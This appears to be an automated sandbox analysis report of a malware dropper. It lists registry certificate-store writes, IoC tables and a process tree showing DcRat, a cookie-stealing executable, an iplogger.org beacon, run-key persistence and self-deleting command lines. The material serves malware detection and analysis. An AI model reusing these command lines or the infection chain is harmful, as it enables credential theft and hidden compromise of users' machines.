Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a50f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	18E7E.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 5c0000000100000004000000000800001900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181187e00000001000000080000000000cf97a737d6010b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded37f0000000100000016000000301406082b0601050507030906082b06010505070301620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d814362409000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad0400000001000000100000002c8f9f661d1890b147269d8e86828ca92000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	18E7E.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

arnatic_2.exejfiag3g_gg.exe

pid	process
3744	arnatic_2.exe
3744	arnatic_2.exe
3428	jfiag3g_gg.exe
3428	jfiag3g_gg.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3024
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

arnatic_2.exe

pid process

3744 arnatic_2.exe

pid	process
3024

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

arnatic_5.exearnatic_7.exei4kQYiLo_Xoj5h41XqopJpAD.exeRuntimeBroker.exe18E7E.exerx15ch6lKgzXhS5SJ2PQJDtf.exeZGn6AwVZy9bMQ_xay87jBBhP.exe

description	pid	process
Token: SeDebugPrivilege	4060	arnatic_5.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	1272	arnatic_7.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	2084	i4kQYiLo_Xoj5h41XqopJpAD.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	3388	RuntimeBroker.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	4520	18E7E.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	1640	rx15ch6lKgzXhS5SJ2PQJDtf.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	4372	ZGn6AwVZy9bMQ_xay87jBBhP.exe
Token: SeShutdownPrivilege	3024

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

ZXtFTIxdF8eeInhLDxuQg75q.exe81DDDJKEML44GM9.exeRuntimeBroker.exe

pid process

3388 ZXtFTIxdF8eeInhLDxuQg75q.exe
5000 81DDDJKEML44GM9.exe
5000 81DDDJKEML44GM9.exe
3388 RuntimeBroker.exe

pid	process
3388	ZXtFTIxdF8eeInhLDxuQg75q.exe
5000	81DDDJKEML44GM9.exe
5000	81DDDJKEML44GM9.exe
3388	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_7.exearnatic_4.exearnatic_3.exearnatic_6.exe

description	pid	process	target process
PID 1824 wrote to memory of 2752	1824	64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe	setup_install.exe
PID 1824 wrote to memory of 2752	1824	64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe	setup_install.exe
PID 1824 wrote to memory of 2752	1824	64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe	setup_install.exe
PID 2752 wrote to memory of 4612	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4612	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4612	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1404	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1404	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1404	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4788	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4788	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4788	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 3792	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 3792	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 3792	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1884	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1884	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 1884	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4560	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4560	2752	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 4560	2752	setup_install.exe	cmd.exe
PID 4560 wrote to memory of 2316	4560	cmd.exe	arnatic_7.exe
PID 4560 wrote to memory of 2316	4560	cmd.exe	arnatic_7.exe
PID 4560 wrote to memory of 2316	4560	cmd.exe	arnatic_7.exe
PID 4788 wrote to memory of 2624	4788	cmd.exe	arnatic_4.exe
PID 4788 wrote to memory of 2624	4788	cmd.exe	arnatic_4.exe
PID 4788 wrote to memory of 2624	4788	cmd.exe	arnatic_4.exe
PID 2692 wrote to memory of 4348	2692	cmd.exe	arnatic_3.exe
PID 2692 wrote to memory of 4348	2692	cmd.exe	arnatic_3.exe
PID 2692 wrote to memory of 4348	2692	cmd.exe	arnatic_3.exe
PID 4612 wrote to memory of 1668	4612	cmd.exe	arnatic_1.exe
PID 4612 wrote to memory of 1668	4612	cmd.exe	arnatic_1.exe
PID 4612 wrote to memory of 1668	4612	cmd.exe	arnatic_1.exe
PID 1884 wrote to memory of 3268	1884	cmd.exe	arnatic_6.exe
PID 1884 wrote to memory of 3268	1884	cmd.exe	arnatic_6.exe
PID 1884 wrote to memory of 3268	1884	cmd.exe	arnatic_6.exe
PID 1404 wrote to memory of 3744	1404	cmd.exe	arnatic_2.exe
PID 1404 wrote to memory of 3744	1404	cmd.exe	arnatic_2.exe
PID 1404 wrote to memory of 3744	1404	cmd.exe	arnatic_2.exe
PID 3792 wrote to memory of 4060	3792	cmd.exe	arnatic_5.exe
PID 3792 wrote to memory of 4060	3792	cmd.exe	arnatic_5.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2624 wrote to memory of 2328	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 2624 wrote to memory of 2328	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 2624 wrote to memory of 2328	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 4348 wrote to memory of 2876	4348	arnatic_3.exe	rUNdlL32.eXe
PID 4348 wrote to memory of 2876	4348	arnatic_3.exe	rUNdlL32.eXe
PID 4348 wrote to memory of 2876	4348	arnatic_3.exe	rUNdlL32.eXe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2316 wrote to memory of 1272	2316	arnatic_7.exe	arnatic_7.exe
PID 2624 wrote to memory of 3428	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 2624 wrote to memory of 3428	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 2624 wrote to memory of 3428	2624	arnatic_4.exe	jfiag3g_gg.exe
PID 3268 wrote to memory of 2284	3268	arnatic_6.exe	HivQFfTyTbtcn9Vi270uOalU.exe
PID 3268 wrote to memory of 2284	3268	arnatic_6.exe	HivQFfTyTbtcn9Vi270uOalU.exe
PID 3268 wrote to memory of 2284	3268	arnatic_6.exe	HivQFfTyTbtcn9Vi270uOalU.exe

C:\Users\Admin\AppData\Local\Temp\64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe
"C:\Users\Admin\AppData\Local\Temp\64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe"
1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1824

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0277515D\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_7.exe
arnatic_7.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2316

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_6.exe
arnatic_6.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3268

C:\Users\Admin\Documents\ZXtFTIxdF8eeInhLDxuQg75q.exe
"C:\Users\Admin\Documents\ZXtFTIxdF8eeInhLDxuQg75q.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XUaAWSp9Mq.bat"
6⤵
PID:4956

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:4796

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4644

C:\Program Files\Mozilla Firefox\RuntimeBroker.exe
"C:\Program Files\Mozilla Firefox\RuntimeBroker.exe"
7⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3388

C:\Users\Admin\Documents\U6CzE6TUlznQXVAFWfCiuZnR.exe
"C:\Users\Admin\Documents\U6CzE6TUlznQXVAFWfCiuZnR.exe"
5⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 432
6⤵
- Program crash
PID:3348

C:\Users\Admin\Documents\HivQFfTyTbtcn9Vi270uOalU.exe
"C:\Users\Admin\Documents\HivQFfTyTbtcn9Vi270uOalU.exe"
5⤵
- Executes dropped EXE
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 464
6⤵
- Program crash
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 472
6⤵
- Program crash
PID:3724

C:\Users\Admin\Documents\6yCiM2IIsLqCpsi76asdsZ0c.exe
"C:\Users\Admin\Documents\6yCiM2IIsLqCpsi76asdsZ0c.exe"
5⤵
- Executes dropped EXE
PID:3392

C:\Users\Admin\Documents\zdwpMJqFcqWr3YEUvTC3idHK.exe
"C:\Users\Admin\Documents\zdwpMJqFcqWr3YEUvTC3idHK.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2380

C:\Users\Admin\Documents\ZGn6AwVZy9bMQ_xay87jBBhP.exe
"C:\Users\Admin\Documents\ZGn6AwVZy9bMQ_xay87jBBhP.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Users\Admin\Documents\yxM2uV2FTRymgklp8YctuBBI.exe
"C:\Users\Admin\Documents\yxM2uV2FTRymgklp8YctuBBI.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
6⤵
PID:1324

C:\Users\Admin\Documents\llxT0QZHj1LDj4GiV1quNPLq.exe
"C:\Users\Admin\Documents\llxT0QZHj1LDj4GiV1quNPLq.exe"
5⤵
- Executes dropped EXE
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 436
6⤵
- Program crash
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 444
6⤵
- Program crash
PID:1668

C:\Users\Admin\Documents\kofbtrmRgcHYpUxlik1pXKnr.exe
"C:\Users\Admin\Documents\kofbtrmRgcHYpUxlik1pXKnr.exe"
5⤵
- Executes dropped EXE
PID:840

C:\Users\Admin\Documents\zg71lq8733KC65bX624m8tqW.exe
"C:\Users\Admin\Documents\zg71lq8733KC65bX624m8tqW.exe"
5⤵
- Executes dropped EXE
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 344
6⤵
- Program crash
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 440
6⤵
- Program crash
PID:2964

C:\Users\Admin\Documents\MljZbu7ph9NCUEiSW32GErzR.exe
"C:\Users\Admin\Documents\MljZbu7ph9NCUEiSW32GErzR.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1864

C:\Users\Admin\AppData\Local\Temp\JDBJ1.exe
"C:\Users\Admin\AppData\Local\Temp\JDBJ1.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1328

C:\Users\Admin\AppData\Local\Temp\BI63G.exe
"C:\Users\Admin\AppData\Local\Temp\BI63G.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2348

C:\Users\Admin\AppData\Local\Temp\24J0M.exe
"C:\Users\Admin\AppData\Local\Temp\24J0M.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4220

C:\Users\Admin\AppData\Local\Temp\GKAEL.exe
"C:\Users\Admin\AppData\Local\Temp\GKAEL.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:4080

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
7⤵
PID:4760

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
8⤵
- Loads dropped DLL
PID:112

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
9⤵
PID:3220

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
10⤵
PID:2980

C:\Users\Admin\AppData\Local\Temp\81DDDJKEML44GM9.exe
https://iplogger.org/1nChi7
6⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5000

C:\Users\Admin\AppData\Local\Temp\18E7E.exe
"C:\Users\Admin\AppData\Local\Temp\18E7E.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Users\Admin\Documents\rx15ch6lKgzXhS5SJ2PQJDtf.exe
"C:\Users\Admin\Documents\rx15ch6lKgzXhS5SJ2PQJDtf.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe
"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"
6⤵
PID:3272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:3972

C:\Users\Admin\Documents\kn7Dcej5u_bXWMYlvahjdyJO.exe
"C:\Users\Admin\Documents\kn7Dcej5u_bXWMYlvahjdyJO.exe"
5⤵
- Executes dropped EXE
PID:4404

C:\Users\Admin\Documents\i4kQYiLo_Xoj5h41XqopJpAD.exe
"C:\Users\Admin\Documents\i4kQYiLo_Xoj5h41XqopJpAD.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Users\Admin\AppData\Local\Temp\0df8c02b-319b-4159-a69c-ccee3707fb1b.exe
"C:\Users\Admin\AppData\Local\Temp\0df8c02b-319b-4159-a69c-ccee3707fb1b.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3272

C:\Users\Admin\Documents\Rq16YJTzBSjm0w4RvKVQ88GB.exe
"C:\Users\Admin\Documents\Rq16YJTzBSjm0w4RvKVQ88GB.exe"
5⤵
- Executes dropped EXE
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 760
6⤵
- Program crash
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 848
6⤵
- Program crash
PID:2572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1304
6⤵
- Program crash
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1328
6⤵
- Program crash
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1336
6⤵
- Program crash
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1352
6⤵
- Program crash
PID:620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Rq16YJTzBSjm0w4RvKVQ88GB.exe" /f & erase "C:\Users\Admin\Documents\Rq16YJTzBSjm0w4RvKVQ88GB.exe" & exit
6⤵
PID:4268

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Rq16YJTzBSjm0w4RvKVQ88GB.exe" /f
7⤵
- Kills process with taskkill
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1360
6⤵
- Program crash
PID:4512

C:\Users\Admin\Documents\mYLeUXmmrgwviYRy3rDnVH8q.exe
"C:\Users\Admin\Documents\mYLeUXmmrgwviYRy3rDnVH8q.exe"
5⤵
- Executes dropped EXE
PID:4820

C:\Users\Admin\Documents\ZXM0rGYRRCeygpTuppavddXW.exe
"C:\Users\Admin\Documents\ZXM0rGYRRCeygpTuppavddXW.exe"
5⤵
- Executes dropped EXE
PID:4620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\ZXM0rGYRRCeygpTuppavddXW.exe
6⤵
PID:1500

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
7⤵
PID:4256

C:\Users\Admin\Documents\usRt7SmHseL2_OtFsuwHtXGf.exe
"C:\Users\Admin\Documents\usRt7SmHseL2_OtFsuwHtXGf.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_5.exe
arnatic_5.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4788

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_4.exe
arnatic_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2624

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:2328

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2692

C:\Users\Admin\AppData\Local\Temp\7zS0277515D\arnatic_3.exe
arnatic_3.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
5⤵
- Loads dropped DLL
PID:2876

C:\Windows\SysWOW64\WerFault.exe
